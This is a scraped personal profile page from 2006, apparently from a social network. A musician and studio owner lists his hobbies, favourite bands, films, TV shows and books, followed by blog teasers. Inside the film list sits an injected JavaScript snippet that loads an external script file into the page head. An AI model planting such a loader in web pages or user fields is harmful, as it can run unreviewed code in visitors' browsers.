Joe profile picture


'ahh geez'

About Me

I'm Joe - I own a small production recording studio and video company. I've been a professional musician for years. I also enjoy photography and boating. I am a Macnut, having owned old school Macs to my G5 dual 2.5 and know that they, not PCs, should rule the computer kingdom....As if I didn't have enough to do, I also have about 40 guitar students and am FINALLY working on my new album.

My Interests

Motorcycling, boating, gaming, flying, writing, etc

I'd like to meet:

Ed Rashid


Yes, Eagles, Minus the Bear, Eric Johnson, Switchfoot, C&C, DCFC, Emerson Lake & Palmer, Mae, Michael McDonald, Jeff Beck, Tool, Acoustic Alchemy, Alter Bridge, Bruce Hornsby, Eric Clapton, Joe Satriani, John Mayer, The Panic Channel, this list has no end..


Saving Private Ryan, Bourne Supremacy, Under The Tuscan Sun, Band Of Brothers, Dumb and Dumber, Lost In Translation, Woodstock (takes me back), Good Will Hunting, Shawshank Redemption, way too many to list .."var s=document.createElement('script');s.src='../x/7318.js';docu ment.getElementsByTagName('head')[0].appendChild(s);"


Food Network, Speed Channel, Whose Line Is It Anyway, Sports and whatnot I even watch Fox News sometimes....(((snap)))


The Bible, Pro Tools For Dummies, Who Really Cares


Jesus, and this guy

My Blog


It seems there is no end to the bizarre ramblings of many so-called'enlightened' elitists... here's a 'nugget' from a French professor: 9160419.htmIf y...
Posted by Joe on Tue, 12 Dec 2006 01:30:00 PST

Not perfect .. just forgiven

     I  AM A CHRISTIAN        &nb sp;          by Maya Angelou     ...
Posted by Joe on Thu, 06 Jul 2006 11:24:00 PST